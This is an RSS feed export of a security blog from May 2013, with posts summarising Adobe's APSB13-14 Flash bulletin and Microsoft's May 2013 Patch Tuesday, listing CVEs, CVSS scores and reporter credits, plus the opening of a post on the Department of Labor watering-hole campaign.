<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Eric Romang Blog</title>
	<atom:link href="http://eromang.zataz.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://eromang.zataz.com</link>
	<description>aka wow on ZATAZ.com</description>
	<lastBuildDate>Fri, 17 May 2013 07:26:13 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>APSB13-14 &#8211; Adobe Flash May 2013 Security Bulletin Review</title>
		<link>http://eromang.zataz.com/2013/05/14/apsb13-14-adobe-flash-may-2013-security-bulletin-review/</link>
		<comments>http://eromang.zataz.com/2013/05/14/apsb13-14-adobe-flash-may-2013-security-bulletin-review/#comments</comments>
		<pubDate>Tue, 14 May 2013 20:58:18 +0000</pubDate>
		<dc:creator>wow</dc:creator>
				<category><![CDATA[Vulnerability Management]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[APSB13-14]]></category>
		<category><![CDATA[CVE-2013-2728]]></category>
		<category><![CDATA[CVE-2013-3324]]></category>
		<category><![CDATA[CVE-2013-3325]]></category>
		<category><![CDATA[CVE-2013-3326]]></category>
		<category><![CDATA[CVE-2013-3327]]></category>
		<category><![CDATA[CVE-2013-3328]]></category>
		<category><![CDATA[CVE-2013-3329]]></category>
		<category><![CDATA[CVE-2013-3330]]></category>
		<category><![CDATA[CVE-2013-3331]]></category>
		<category><![CDATA[CVE-2013-3332]]></category>
		<category><![CDATA[CVE-2013-3333]]></category>
		<category><![CDATA[CVE-2013-3334]]></category>
		<category><![CDATA[CVE-2013-3335]]></category>
		<category><![CDATA[Flash]]></category>

		<guid isPermaLink="false">http://eromang.zataz.com/?p=6550</guid>
		<description><![CDATA[Adobe has release, the May 14th 2013, during his May Patch Tuesday, one Adobe Flash security bulletin dealing with 13 vulnerabilities. This security bulletin has a Critical severity rating. The associated vulnerabilities have all a 10.0 CVSS base score.
APSB13-14 – Adobe Flash May 2013 Security  [...]]]></description>
				<content:encoded><![CDATA[<p>Adobe has release, the May 14th 2013, during his <a href="http://www.adobe.com/support/security/" target="_blank">May Patch Tuesday</a>, one Adobe Flash security bulletin dealing with 13 vulnerabilities. This security bulletin has a <a href="http://www.adobe.com/support/security/severity_ratings.html" target="_blank">Critical</a> severity rating. The associated vulnerabilities have all a <span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score.</p>
<h4>APSB13-14 – Adobe Flash May 2013 Security Bulletin Review</h4>
<p><a href="http://www.adobe.com/support/security/bulletins/apsb13-14.html" target="_blank"><strong>APSB13-14</strong></a> is concerning :</p>
<ul>
<li>Adobe Flash Player 11.7.700.169 and earlier versions for Windows and Macintosh</li>
<li>Adobe Flash Player 11.2.202.280 and earlier versions for Linux</li>
<li>Adobe Flash Player 11.1.115.54 and earlier versions for Android 4.x</li>
<li>Adobe Flash Player 11.1.111.50 and earlier versions for Android 3.x and 2.x</li>
<li>Adobe AIR 3.7.0.1530 and earlier versions for Windows and Macintosh</li>
<li>Adobe AIR 3.7.0.1660 and earlier versions for Android</li>
<li>Adobe AIR 3.7.0.1530 SDK &amp; Compiler and earlier versions</li>
</ul>
<p><a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2728" target="_blank">CVE-2013-2728</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3324" target="_blank">CVE-2013-3324</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3325" target="_blank">CVE-2013-3325</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3326" target="_blank">CVE-2013-3326</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3327" target="_blank">CVE-2013-3327</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3328" target="_blank">CVE-2013-3328</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3329" target="_blank">CVE-2013-3329</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3330" target="_blank">CVE-2013-3330</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3331" target="_blank">CVE-2013-3331</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score) and <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3332" target="_blank">CVE-2013-3332</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score) were discovered and privately reported by Mateusz Jurczyk and Ben Hawkes of the Google Security Team.</p>
<p><a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3333" target="_blank">CVE-2013-3333</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3334" target="_blank">CVE-2013-3334</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score) and <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3335" target="_blank">CVE-2013-3335</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score) were discovered and privately reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security Team.</p>

<div class="wp_rp_wrap  wp_rp_plain" id="wp_rp_first"><div class="wp_rp_content"><h3 class="related_post_title">I recommend you to read these related posts</h3><ul class="related_post wp_rp" style="visibility: visible"><li data-position="0" data-poid="in-6450" data-post-type="none" ><a href="http://eromang.zataz.com/2013/04/09/apsb13-11-adobe-flash-april-2013-security-bulletin-review/" class="wp_rp_title">APSB13-11 &#8211; Adobe Flash April 2013 Security Bulletin Review</a></li><li data-position="1" data-poid="in-6032" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/09/apsb13-01-adobe-flash-january-2013-security-bulletin-review/" class="wp_rp_title">APSB13-01 &#8211; Adobe Flash January 2013 Security Bulletin Review</a></li><li data-position="2" data-poid="in-5841" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/12/apsb12-27-adobe-flash-december-2012-security-bulletin-review/" class="wp_rp_title">APSB12-27 &#8211; Adobe Flash December 2012 Security Bulletin Review</a></li><li data-position="3" data-poid="in-5771" data-post-type="none" ><a href="http://eromang.zataz.com/2012/11/07/apsb12-24-adobe-november-2012-patch-tuesday-review/" class="wp_rp_title">APSB12-24 &#8211; Adobe November 2012 Patch Tuesday Review</a></li><li data-position="4" data-poid="in-4042" data-post-type="none" ><a href="http://eromang.zataz.com/2012/10/08/apsb12-22-adobe-october-2012-patch-tuesday-review/" class="wp_rp_title">APSB12-22 &#8211; Adobe October 2012 Patch Tuesday Review</a></li><li data-position="5" data-poid="in-6547" data-post-type="none" ><a href="http://eromang.zataz.com/2013/05/14/microsoft-may-2013-patch-tuesday-review/" class="wp_rp_title">Microsoft May 2013 Patch Tuesday Review</a></li><li data-position="6" data-poid="in-5909" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/27/adobe-flash-2012-vulnerabilities-review/" class="wp_rp_title">Adobe Flash 2012 Vulnerabilities Review</a></li><li data-position="7" data-poid="in-3915" data-post-type="none" ><a href="http://eromang.zataz.com/2012/08/19/adobe-august-2012-patch-tuesday-review/" class="wp_rp_title">Adobe August 2012 Patch Tuesday Review</a></li><li data-position="8" data-poid="in-5838" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/12/microsoft-december-2012-patch-tuesday-review/" class="wp_rp_title">Microsoft December 2012 Patch Tuesday Review</a></li><li data-position="9" data-poid="in-6027" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/09/microsoft-january-2013-patch-tuesday-review/" class="wp_rp_title">Microsoft January 2013 Patch Tuesday Review</a></li></ul><div class="wp_rp_footer"><a class="wp_rp_backlink" target="_blank" href="http://www.zemanta.com/?wp-related-posts">Zemanta</a></div></div></div>
]]></content:encoded>
			<wfw:commentRss>http://eromang.zataz.com/2013/05/14/apsb13-14-adobe-flash-may-2013-security-bulletin-review/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Microsoft May 2013 Patch Tuesday Review</title>
		<link>http://eromang.zataz.com/2013/05/14/microsoft-may-2013-patch-tuesday-review/</link>
		<comments>http://eromang.zataz.com/2013/05/14/microsoft-may-2013-patch-tuesday-review/#comments</comments>
		<pubDate>Tue, 14 May 2013 20:40:00 +0000</pubDate>
		<dc:creator>wow</dc:creator>
				<category><![CDATA[Vulnerability Management]]></category>
		<category><![CDATA[APSB13-14]]></category>
		<category><![CDATA[CVE-2013-0096]]></category>
		<category><![CDATA[CVE-2013-0811]]></category>
		<category><![CDATA[CVE-2013-1297]]></category>
		<category><![CDATA[CVE-2013-1301]]></category>
		<category><![CDATA[CVE-2013-1302]]></category>
		<category><![CDATA[CVE-2013-1303]]></category>
		<category><![CDATA[CVE-2013-1305]]></category>
		<category><![CDATA[CVE-2013-1306]]></category>
		<category><![CDATA[CVE-2013-1307]]></category>
		<category><![CDATA[CVE-2013-1308]]></category>
		<category><![CDATA[CVE-2013-1309]]></category>
		<category><![CDATA[CVE-2013-1310]]></category>
		<category><![CDATA[CVE-2013-1311]]></category>
		<category><![CDATA[CVE-2013-1313]]></category>
		<category><![CDATA[CVE-2013-1316]]></category>
		<category><![CDATA[CVE-2013-1317]]></category>
		<category><![CDATA[CVE-2013-1318]]></category>
		<category><![CDATA[CVE-2013-1319]]></category>
		<category><![CDATA[CVE-2013-1320]]></category>
		<category><![CDATA[CVE-2013-1321]]></category>
		<category><![CDATA[CVE-2013-1322]]></category>
		<category><![CDATA[CVE-2013-1323]]></category>
		<category><![CDATA[CVE-2013-1327]]></category>
		<category><![CDATA[CVE-2013-1328]]></category>
		<category><![CDATA[CVE-2013-1329]]></category>
		<category><![CDATA[CVE-2013-1332]]></category>
		<category><![CDATA[CVE-2013-1333]]></category>
		<category><![CDATA[CVE-2013-1334]]></category>
		<category><![CDATA[CVE-2013-1335]]></category>
		<category><![CDATA[CVE-2013-1336]]></category>
		<category><![CDATA[CVE-2013-1337]]></category>
		<category><![CDATA[CVE-2013-1347]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[KB2813707]]></category>
		<category><![CDATA[KB2820197]]></category>
		<category><![CDATA[KB2829254]]></category>
		<category><![CDATA[KB2829530]]></category>
		<category><![CDATA[KB2830397]]></category>
		<category><![CDATA[KB2830399]]></category>
		<category><![CDATA[KB2834692]]></category>
		<category><![CDATA[KB2834695]]></category>
		<category><![CDATA[KB2836440]]></category>
		<category><![CDATA[KB2840221]]></category>
		<category><![CDATA[KB2840613]]></category>
		<category><![CDATA[KB2847204]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[MS13-037]]></category>
		<category><![CDATA[MS13-038]]></category>
		<category><![CDATA[MS13-039]]></category>
		<category><![CDATA[MS13-040]]></category>
		<category><![CDATA[MS13-041]]></category>
		<category><![CDATA[MS13-042]]></category>
		<category><![CDATA[MS13-043]]></category>
		<category><![CDATA[MS13-044]]></category>
		<category><![CDATA[MS13-045]]></category>
		<category><![CDATA[MS13-046]]></category>
		<category><![CDATA[MSA-2755801]]></category>
		<category><![CDATA[MSA-2820197]]></category>
		<category><![CDATA[MSA-2846338]]></category>
		<category><![CDATA[MSA-2847140]]></category>

		<guid isPermaLink="false">http://eromang.zataz.com/?p=6547</guid>
		<description><![CDATA[Microsoft has release, May 14th 2013, during his May Patch Tuesday, two updated security advisories, two new security advisories and ten security bulletins. On the ten security bulletins two of them have a Critical security rating.
Microsoft Security Advisory 2755801
MSA-2755801,released during  [...]]]></description>
				<content:encoded><![CDATA[<p>Microsoft has release, May 14th 2013, during his <a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-may" target="_blank">May Patch Tuesday</a>, two updated security advisories, two new security advisories and ten security bulletins. On the ten security bulletins two of them have a Critical security rating.</p>
<h4>Microsoft Security Advisory 2755801</h4>
<p><a href="http://technet.microsoft.com/en-us/security/advisory/2755801" target="_blank"><strong>MSA-2755801</strong></a>,released during September 2012, has been updated. The security advisory is regarding updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10. KB2840613 has been released for supported editions of Windows 8, Windows Server 2012, and Windows RT. The update addresses the vulnerabilities described in Adobe Security bulletin <a title="APSB13-14 – Adobe Flash May 2013 Security Bulletin Review" href="http://eromang.zataz.com/2013/05/14/apsb13-14-adobe-flash-may-2013-security-bulletin-review/" target="_blank"><strong>APSB13-14</strong></a>.</p>
<h4>Microsoft Security Advisory 2820197</h4>
<p><a href="http://technet.microsoft.com/en-us/security/advisory/2820197" target="_blank"><strong>MSA-2820197</strong></a> update includes kill bits to prevent <em>Honeywell Enterprise Buildings Integrator</em> and <em>SymmetrE and ComfortPoint Open Manager</em> ActiveX controls from being run in Internet Explorer.</p>
<h4>Microsoft Security Advisory 2846338</h4>
<p><a href="http://technet.microsoft.com/en-us/security/advisory/2846338" target="_blank"><strong>MSA-2846338</strong></a> concern a privately reported security vulnerability, <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1303" target="_blank">CVE-2013-1303</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score), in Microsoft Malware Protection Engine that could allow remote code execution if the Microsoft Malware Protection Engine scans a specially crafted file. This vulnerability has been publicly disclosed as a denial of service. Only x64-based versions of the Malware Protection Engine are affected.</p>
<h4>Microsoft Security Advisory 2847140</h4>
<p><a href="http://technet.microsoft.com/en-us/security/advisory/2847140" target="_blank"><strong>MSA-2847140</strong></a>, released May 3rd 2013, has been updated. The security advisory concern Microsoft Internet Explorer 8 remote code execution vulnerability (CVE-2013-1347) used in <a title="Department of Labor Watering Hole Campaign Review" href="http://eromang.zataz.com/2013/05/10/department-of-labor-watering-hole-campaign-review/" target="_blank"><strong>targeted attacks</strong></a> against United States Department of Labor (DOL) Site Exposure Matrices (SEM) and other websites. Microsoft has issue MS13-038 to address the vulnerability.</p>
<h4>MS13-037 Cumulative Security Update for Internet Explorer</h4>
<p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-037" target="_blank"><strong>MS13-037</strong></a> security update, classified as Critical, allowing remote code execution, is the fix for 11 privately reported vulnerabilities in Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, and Internet Explorer 10. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1297" target="_blank">CVE-2013-1297</a> (<span style="color: #ff6600;"><strong>4.3</strong></span> CVSS base score) was discovered and privately reported by Yosuke Hasegawa. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0811" target="_blank">CVE-2013-0811</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score) was discovered and privately reported by Jose Antonio Vazquez Gonzalez, working with VeriSign iDefense Labs. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1306" target="_blank">CVE-2013-1306</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score) and <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1309" target="_blank">CVE-2013-1309</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score) were discovered and privately reported by SkyLined, working with HP&#8217;s Zero Day Initiative. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1307" target="_blank">CVE-2013-1307</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score) was discovered and privately reported by Ivan Fratric of the Google Security Team. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1308" target="_blank">CVE-2013-1308</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score) was discovered and privately reported by Aniway.Anyway@gmail.com, working with HP&#8217;s Zero Day Initiative. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1310" target="_blank">CVE-2013-1310</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score) was discovered and privately reported by Yuhong Bao. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1311" target="_blank">CVE-2013-1311</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score) was discovered and privately reported by Scott Bell of Security-Assessment.com. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1312" target="_blank">CVE-2013-1312</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score) was discovered and privately reported by Stephen Fewer of Harmony Security. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1313" target="_blank">CVE-2013-1313</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score) was discovered and privately reported by VUPEN Security (Pwn2Own 2013), working with HP&#8217;s Zero Day Initiative.</p>
<h4>MS13-038 Security Update for Internet Explorer</h4>
<p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-038" target="_blank"><strong>MS13-038</strong></a> security update, classified as Critical, allowing remote code execution, is the fix for one publicly disclosed vulnerability in Internet Explorer 8. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347" target="_blank">CVE-2013-1347</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score), was discovered exploited in the wild in targeted attacks.</p>
<h4>MS13-039 Vulnerability in HTTP.sys Could Allow Denial of Service</h4>
<p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-039" target="_blank"><strong>MS13-039</strong></a> security update, classified as Important, allowing denial of service, is the fix for one privately reported vulnerability in Microsoft Windows. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1305" target="_blank">CVE-2013-1305</a> (<span style="color: #ff6600;"><strong>5.0</strong></span> CVSS base score) was discovered and privately reported by Marek Kroemeke, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, AKAT-1, working with HP&#8217;s Zero Day Initiative.</p>
<h4>MS13-040 Vulnerabilities in .NET Framework Could Allow Spoofing</h4>
<p><a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-040" target="_blank"><strong>MS13-040</strong></a> security update, classified as Important, allowing spoofing, is the fix for one privately reported vulnerability and one publicly disclosed vulnerability in .NET Framework. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1336" target="_blank">CVE-2013-1336</a> (<span style="color: #ff6600;"><strong>5.0</strong></span> CVSS base score) was discovered and privately reported by James Forshaw of Context Information Security. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1337" target="_blank">CVE-2013-1337</a> (<span style="color: #ff0000;"><strong>7.5</strong></span> CVSS base score) was publicly disclosed.</p>
<h4>MS13-041 Vulnerability in Lync Could Allow Remote Code Execution</h4>
<p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-041" target="_blank"><strong>MS13-041</strong></a> security update, classified as Important, allowing remote code execution, is the fix for one privately reported vulnerability in Microsoft Lync. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1302" target="_blank">CVE-2013-1302</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score) was discovered and privately reported.</p>
<h4>MS13-042 Vulnerabilities in Microsoft Publisher Could Allow Remote Code Execution</h4>
<p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-042" target="_blank"><strong>MS13-042</strong></a> security update, classified as Important, allowing remote code execution, is the fix for 11 privately reported vulnerabilities in Microsoft Office. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1316" target="_blank">CVE-2013-1316</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1317" target="_blank">CVE-2013-1317</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1318" target="_blank">CVE-2013-1318</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1319" target="_blank">CVE-2013-1319</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1320" target="_blank">CVE-2013-1320</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1321" target="_blank">CVE-2013-1321</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1322" target="_blank">CVE-2013-1322</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1323" target="_blank">CVE-2013-1323</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1327" target="_blank">CVE-2013-1327</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score), <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1328" target="_blank">CVE-2013-1328</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score) and <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1329" target="_blank">CVE-2013-1329</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score) were discovered and privately reported by Will Dormann of the CERT/CC.</p>
<h4>MS13-043 Vulnerability in Microsoft Word Could Allow Remote Code Execution</h4>
<p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-043" target="_blank"><strong>MS13-043</strong></a> security update, classified as Important, allowing remote code execution, is the fix for one privately reported vulnerability in Microsoft Office. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1335" target="_blank">CVE-2013-1335</a> (<span style="color: #ff0000;"><strong>9.3</strong></span> CVSS base score) was discovered and privately reported by Will Dormann of the CERT/CC.</p>
<h4>MS13-044 Vulnerability in Microsoft Visio Could Allow Information Disclosure</h4>
<p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-044" target="_blank"><strong>MS13-044</strong></a> security update, classified as Important, allowing information disclosure, is the fix for one privately reported vulnerability in Microsoft Office. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1301" target="_blank">CVE-2013-1301</a> (<span style="color: #ff6600;"><strong>4.3</strong></span> CVSS base score) was discovered and privately reported by Timur Yunusov of Positive Technologies.</p>
<h4>MS13-045 Vulnerability in Windows Essentials Could Allow Information Disclosure</h4>
<p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-045" target="_blank"><strong>MS13-045</strong></a> security update, classified as Important, allowing information disclosure, is the fix for one privately reported vulnerability in Windows Essentials. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0096" target="_blank">CVE-2013-0096</a> (<span style="color: #ff6600;"><strong>6.8</strong></span> CVSS base score) was discovered and privately reported by Andrea Micalizzi, working with Beyond Security&#8217;s SecuriTeam Secure Disclosure team.</p>
<h4>MS13-046 Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege</h4>
<p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-046" target="_blank"><strong>MS13-046</strong> </a>security update, classified as Important, allowing elevation of privilege, is the fix for three privately reported vulnerabilities in Microsoft Windows. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1332" target="_blank">CVE-2013-1332</a> (<span style="color: #ff0000;"><strong>7.2</strong></span> CVSS base score) was discovered and privately reported by Gynvael Coldwind and Mateusz &#8220;j00ru&#8221; Jurczyk of Google Inc. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1333" target="_blank">CVE-2013-1333</a> (<span style="color: #ff0000;"><strong>7.2</strong></span> CVSS base score) was discovered and privately reported by Qihoo 360 Security Center. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1334" target="_blank">CVE-2013-1334</a> (<span style="color: #ff0000;"><strong>7.2</strong></span> CVSS base score) was discovered and privately reported by an anonymous researcher, working with the iDefense VCP.</p>

<div class="wp_rp_wrap  wp_rp_plain" ><div class="wp_rp_content"><h3 class="related_post_title">I recommend you to read these related posts</h3><ul class="related_post wp_rp" style="visibility: visible"><li data-position="0" data-poid="in-6487" data-post-type="none" ><a href="http://eromang.zataz.com/2013/05/05/cve-2013-1347-microsoft-internet-explorer-8-vulnerability-metasploit-demo/" class="wp_rp_title">CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo</a></li><li data-position="1" data-poid="in-6489" data-post-type="none" ><a href="http://eromang.zataz.com/2013/05/10/department-of-labor-watering-hole-campaign-review/" class="wp_rp_title">Department of Labor Watering Hole Campaign Review</a></li><li data-position="2" data-poid="in-6157" data-post-type="none" ><a href="http://eromang.zataz.com/2013/02/13/microsoft-february-2013-patch-tuesday-review/" class="wp_rp_title">Microsoft February 2013 Patch Tuesday Review</a></li><li data-position="3" data-poid="in-6447" data-post-type="none" ><a href="http://eromang.zataz.com/2013/04/09/microsoft-april-2013-patch-tuesday-review/" class="wp_rp_title">Microsoft April 2013 Patch Tuesday Review</a></li><li data-position="4" data-poid="in-5838" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/12/microsoft-december-2012-patch-tuesday-review/" class="wp_rp_title">Microsoft December 2012 Patch Tuesday Review</a></li><li data-position="5" data-poid="in-6027" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/09/microsoft-january-2013-patch-tuesday-review/" class="wp_rp_title">Microsoft January 2013 Patch Tuesday Review</a></li><li data-position="6" data-poid="in-6550" data-post-type="none" ><a href="http://eromang.zataz.com/2013/05/14/apsb13-14-adobe-flash-may-2013-security-bulletin-review/" class="wp_rp_title">APSB13-14 &#8211; Adobe Flash May 2013 Security Bulletin Review</a></li><li data-position="7" data-poid="in-6334" data-post-type="none" ><a href="http://eromang.zataz.com/2013/03/12/microsoft-march-2013-patch-tuesday-review/" class="wp_rp_title">Microsoft March 2013 Patch Tuesday Review</a></li><li data-position="8" data-poid="in-6527" data-post-type="none" ><a href="http://eromang.zataz.com/2013/05/12/dol-watering-hole-campaign-and-sexy-swedish-soccer-supporter/" class="wp_rp_title">DOL Watering Hole Campaign and Sexy Swedish Soccer Supporter</a></li><li data-position="9" data-poid="in-5941" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/30/microsoft-release-security-advisory-msa-2794220-for-cfe-internet-explorer-0day/" class="wp_rp_title">Microsoft Release Security Advisory MSA-2794220 for CFE Internet Explorer 0day</a></li></ul><div class="wp_rp_footer"><a class="wp_rp_backlink" target="_blank" href="http://www.zemanta.com/?wp-related-posts">Zemanta</a></div></div></div>
]]></content:encoded>
			<wfw:commentRss>http://eromang.zataz.com/2013/05/14/microsoft-may-2013-patch-tuesday-review/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>DOL Watering Hole Campaign and Sexy Swedish Soccer Supporter</title>
		<link>http://eromang.zataz.com/2013/05/12/dol-watering-hole-campaign-and-sexy-swedish-soccer-supporter/</link>
		<comments>http://eromang.zataz.com/2013/05/12/dol-watering-hole-campaign-and-sexy-swedish-soccer-supporter/#comments</comments>
		<pubDate>Sun, 12 May 2013 21:27:57 +0000</pubDate>
		<dc:creator>wow</dc:creator>
				<category><![CDATA[Various]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[CVE-2013-1347]]></category>
		<category><![CDATA[Department of Labor]]></category>
		<category><![CDATA[DOL]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[Internet Explorer 0day]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://eromang.zataz.com/?p=6527</guid>
		<description><![CDATA[As I explained in my previous blog post, nine websites were involved in the DOL watering hole campaign. The first involved website was University Research Co. Cambodia (www[.]urccambodia[.]org) from 2013-03-15 to 2013-04-29. This website came out of the context of other websites used in this  [...]]]></description>
				<content:encoded><![CDATA[<p>As I explained in my <a title="Department of Labor Watering Hole Campaign Review" href="http://eromang.zataz.com/2013/05/10/department-of-labor-watering-hole-campaign-review/" target="_blank">previous blog post</a>, nine websites were involved in the DOL watering hole campaign. The first involved website was <strong>University Research Co. Cambodia</strong> (www[.]urccambodia[.]org) from 2013-03-15 to 2013-04-29. This website came out of the context of other websites used in this watering hole campaign.</p>
